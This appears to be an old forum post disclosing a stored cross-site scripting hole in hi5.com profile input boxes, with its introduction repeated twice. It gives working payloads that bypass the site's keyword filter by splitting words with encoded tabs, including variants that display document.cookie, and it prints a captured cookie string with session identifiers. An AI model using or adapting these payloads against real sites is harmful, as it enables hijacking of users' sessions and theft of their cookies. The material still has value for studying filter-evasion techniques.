It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Heres a link to the page that lists allthe tags they will and won't allow:
http://hi5.com/friend/account/html_tips.html
How do we get around this? Well, to get around the javascript filtering we use An embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC try putting this in your profile. (I used the Hometown box, all should work tho) :
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expected). Heres a link to the page that lists allthe tags they will and won't allow:
http://hi5.com/friend/account/html_tips.html
How do we get around this? Well, to get around the javascript filtering we use An embedded encoded tab to break up the javascript word. Below are a few examples of it. For PoC try putting this in your profile. (I used the Hometown box, all should work tho) :
<IMG SRC="jav ascript:alert('XSS');">
or
<DIV STYLE="background-image: url(jav ascript:al ert('XSS'))">
Why do we have to use an embedded encoded tab in the word "alert" in a div tag and not a img tag? I have no idea!
Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg
WHERES THE COOKIE?!?!
Now lets change that so we can show our cookie data. Since they don't seem to allow thewords document and cookie,
lets use the same method above to break it up. Try putting:
Popup alert:
<IMG SRC="jav ascript:alert(docu ment.coo kie);">
Write on screen:
<IMG SRC="jav ascript:docu ment.write(docu ment.cookie);">
Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; hi5adcomRect; hi5adcomSky; hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:115026889048
5:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150
269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:115026943
8591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146
:15:1150269654968; sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=100
1:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018
:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:115026979
9646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:11502
70823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269
086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:115
0269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002
:1150269691452:2012:115
0269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015
:1150270141733
Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg
[ reply ]